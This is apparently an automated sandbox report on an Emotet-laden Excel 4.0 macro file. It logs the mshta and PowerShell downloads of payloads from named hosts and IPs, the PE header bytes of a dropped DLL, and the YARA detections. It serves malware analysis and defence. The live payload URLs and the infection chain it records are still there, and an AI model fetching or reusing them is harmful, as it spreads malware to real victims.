Source: global traffic	HTTP traffic detected: GET /moodle/report/trainingsessions/xdxd3JtJs4qRKlVX/ HTTP/1.1Host: schedu.teicrete.grConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View	IP Address: 212.237.17.99 212.237.17.99

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.4.6 (Ubuntu)Date: Thu, 23 Dec 2021 03:04:07 GMTContent-Type: application/x-msdownloadContent-Length: 536576Connection: keep-aliveX-Powered-By: PHP/5.5.9-1ubuntu4.29Set-Cookie: 61c3e727b7489=1640228647; expires=Thu, 23-Dec-2021 03:05:07 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Thu, 23 Dec 2021 03:04:07 GMTExpires: Thu, 23 Dec 2021 03:04:07 GMTContent-Disposition: attachment; filename="TjTDQY4hd.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 0a 00 e3 0b c3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 42 04 00 00 e6 03 00 00 00 00 00 64 4a 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 98 80 05 00 c2 03 00 00 5a 84 05 00 b4 00 00 00 00 40 06 00 10 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 54 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 3c 05 00 18 00 00 00 98 c7 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 08 88 05 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 41 04 00 00 10 00 00 00 42 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e8 58 01 00 00 60 04 00 00 5a 01 00 00 46 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 24 25 00 00 00 c0 05 00 00 16 00 00 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 f0 05 00 00 02 00 00 00 b6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 66 61 78 74 00 00 00 1c 00 00 00 00 00 06 00 00 02 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 08 00 00 00 00 10 06 00 00 02 00 00 00 ba 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 20 06 00 00 02 00 00 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6f 6c 74 62 6c 00 81 02 00 00 00 30 06 00 00 04 00 00 00 be 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 72 73 72 63 00 00 00 10 3e 02 00 00 40 06 00 00 40 02 00 00 c2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 2d 00 00 00 80 08 00 00 2e 00 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@

Source: global traffic

HTTP traffic detected: GET /pp/oo.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.251.86.178Connection: Keep-Alive

Source: unknown

Network traffic detected: IP country count 20

Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178
Source: unknown	TCP traffic detected without corresponding DNS query: 87.251.86.178

Source: mshta.exe, 00000003.00000003.409646129.000000000039C000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.414948487.000000000039D000.00000004.00000001.sdmp, mshta.exe, 00000003.00000002.416713796.000000000039D000.00000004.00000001.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comOb equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000003.00000003.409646129.000000000039C000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.414948487.000000000039D000.00000004.00000001.sdmp, mshta.exe, 00000003.00000002.416713796.000000000039D000.00000004.00000001.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: powershell.exe, 00000005.00000002.670096499.000000000362F000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.86
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.670096499.000000000362F000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.86.178
Source: powershell.exe, 00000005.00000002.670096499.000000000362F000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.671551800.000000001B871000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.86.178/pp/PP.PNG
Source: powershell.exe, 00000005.00000002.670096499.000000000362F000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.86.178/pp/PP.PNGPE3
Source: mshta.exe, 00000003.00000002.416686072.000000000036E000.00000004.00000020.sdmp, mshta.exe, 00000003.00000003.416139999.0000000003E35000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.html
Source: mshta.exe, 00000003.00000003.409646129.000000000039C000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.414948487.000000000039D000.00000004.00000001.sdmp, mshta.exe, 00000003.00000002.416713796.000000000039D000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.html...Ab
Source: mshta.exe, 00000003.00000002.416845514.00000000005E4000.00000004.00000040.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.html7Bp4
Source: mshta.exe, 00000003.00000002.417491863.0000000003E35000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.416139999.0000000003E35000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.htmlC:
Source: mshta.exe, 00000003.00000002.416667688.0000000000330000.00000004.00000020.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.htmlWinSta0
Source: mshta.exe, 00000003.00000003.409657707.00000000003AF000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.htmlZM
Source: mshta.exe, 00000003.00000003.411447891.0000000003085000.00000004.00000001.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.htmlhttp://87.251.86.178/pp/oo.html
Source: mshta.exe, 00000003.00000002.416686072.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.htmll
Source: mshta.exe, 00000003.00000002.416686072.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.htmllA
Source: mshta.exe, 00000003.00000002.416667688.0000000000330000.00000004.00000020.sdmp	String found in binary or memory: http://87.251.86.178/pp/oo.htmlmshta
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://angel.bk.
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://angel.bk.idv.tw/web_image
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://angel.bk.idv.tw/web_images/vB5Enm5Ciwr8/
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://angel.bk.idv.tw/web_images/vB5Enm5Ciwr8/PE3
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://econews.s
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://econews.site/content/page
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://econews.site/content/pages/IxolPreOkVGdbI9OX/wNu12HviTj/
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://econews.site/content/pages/IxolPreOkVGdbI9OX/wNu12HviTj/PE3
Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://schedu.te
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://schedu.teicrete.gr
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://schedu.teicrete.gr/moodle
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://schedu.teicrete.gr/moodle/report/trainingsessions/xdxd3Jt
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://schedu.teicrete.gr/moodle/report/trainingsessions/xdxd3JtJs4qRKlVX/
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://schedu.teicrete.gr/moodle/report/trainingsessions/xdxd3JtJs4qRKlVX/PE3
Source: mshta.exe, 00000003.00000002.418147113.0000000004990000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.665291877.0000000002410000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://sssilkplaster.in/argyrose
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://sssilkplaster.in/argyrose/Jr8H2ybRNlh5Y/
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://sssilkplaster.in/argyrose/Jr8H2ybRNlh5Y/PE3
Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000003.00000002.418147113.0000000004990000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.665291877.0000000002410000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://www.catholicroundup.com
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://www.catholicroundup.com/w
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://www.catholicroundup.com/wp-content/gF1nMkOSsT0Jq/
Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp	String found in binary or memory: http://www.catholicroundup.com/wp-content/gF1nMkOSsT0Jq/PE3
Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.co
Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/c
Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000003.00000003.416147264.0000000003E75000.00000004.00000001.sdmp	String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000003.00000003.409682749.00000000003D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.protware.comGj
Source: rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8624E0FD.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.catholicroundup.com

Source: global traffic	HTTP traffic detected: GET /pp/oo.html HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.251.86.178Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pp/PP.PNG HTTP/1.1Host: 87.251.86.178Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/gF1nMkOSsT0Jq/ HTTP/1.1Host: www.catholicroundup.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /moodle/report/trainingsessions/xdxd3JtJs4qRKlVX/ HTTP/1.1Host: schedu.teicrete.grConnection: Keep-Alive

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.577830349.0000000000602000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.577733868.0000000000180000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\ssd.dll

Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: ggnlRjkfr4.xls	Initial sample: EXEC
Source: ggnlRjkfr4.xls	Initial sample: EXEC

Source: ggnlRjkfr4.xls, type: SAMPLE	Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: ggnlRjkfr4.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019CFAA	8_2_0019CFAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018D1FD	8_2_0018D1FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019BE1F	8_2_0019BE1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00184A13	8_2_00184A13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00196015	8_2_00196015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018FE15	8_2_0018FE15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018F217	8_2_0018F217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00182617	8_2_00182617
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019000D	8_2_0019000D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A0C0C	8_2_001A0C0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00182800	8_2_00182800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018BC07	8_2_0018BC07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00187E3E	8_2_00187E3E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A1033	8_2_001A1033
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00190C2F	8_2_00190C2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018DC24	8_2_0018DC24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019EC5A	8_2_0019EC5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00188650	8_2_00188650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00185651	8_2_00185651
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00197679	8_2_00197679
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00182C79	8_2_00182C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019B278	8_2_0019B278
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018C87E	8_2_0018C87E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019C47E	8_2_0019C47E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018C29B	8_2_0018C29B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019A288	8_2_0019A288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00193682	8_2_00193682
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A02B3	8_2_001A02B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00199EB5	8_2_00199EB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018A4AA	8_2_0018A4AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019D8AD	8_2_0019D8AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019F0A7	8_2_0019F0A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A2EA4	8_2_001A2EA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00190ED9	8_2_00190ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001908D9	8_2_001908D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019B6DB	8_2_0019B6DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018CADE	8_2_0018CADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001844D2	8_2_001844D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00196ACA	8_2_00196ACA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001888FC	8_2_001888FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00191EFC	8_2_00191EFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018D8F0	8_2_0018D8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018A6F7	8_2_0018A6F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001860E8	8_2_001860E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018D4EE	8_2_0018D4EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00181EE2	8_2_00181EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019E2E4	8_2_0019E2E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019A712	8_2_0019A712
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00182317	8_2_00182317
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019F90C	8_2_0019F90C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019EB0F	8_2_0019EB0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A0701	8_2_001A0701
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019713E	8_2_0019713E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00187931	8_2_00187931
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00193B36	8_2_00193B36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00194F2A	8_2_00194F2A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019FB22	8_2_0019FB22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018C551	8_2_0018C551
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00187549	8_2_00187549
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019514C	8_2_0019514C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018CD42	8_2_0018CD42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00192378	8_2_00192378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019177E	8_2_0019177E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00181B70	8_2_00181B70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00188B74	8_2_00188B74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018416C	8_2_0018416C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A196C	8_2_001A196C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018E16F	8_2_0018E16F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019C962	8_2_0019C962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018BD63	8_2_0018BD63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A0588	8_2_001A0588
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0019058C	8_2_0019058C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A31BA	8_2_001A31BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001865BD	8_2_001865BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00189DA8	8_2_00189DA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018A1AA	8_2_0018A1AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A1FA6	8_2_001A1FA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001893A7	8_2_001893A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018ADD9	8_2_0018ADD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018B9D5	8_2_0018B9D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001A27CB	8_2_001A27CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001965CD	8_2_001965CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00188FCE	8_2_00188FCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00197FFB	8_2_00197FFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00193FF3	8_2_00193FF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0018FBF7	8_2_0018FBF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001979EC	8_2_001979EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001857E6	8_2_001857E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_7299D9A0	8_2_7299D9A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B9384	8_2_729B9384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B03D0	8_2_729B03D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729D33F8	8_2_729D33F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729A3320	8_2_729A3320
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729A6010	8_2_729A6010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729AA6C0	8_2_729AA6C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B87CF	8_2_729B87CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729D34B2	8_2_729D34B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729C55D9	8_2_729C55D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729CE5F3	8_2_729CE5F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729A6500	8_2_729A6500
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729B0880	8_2_729B0880
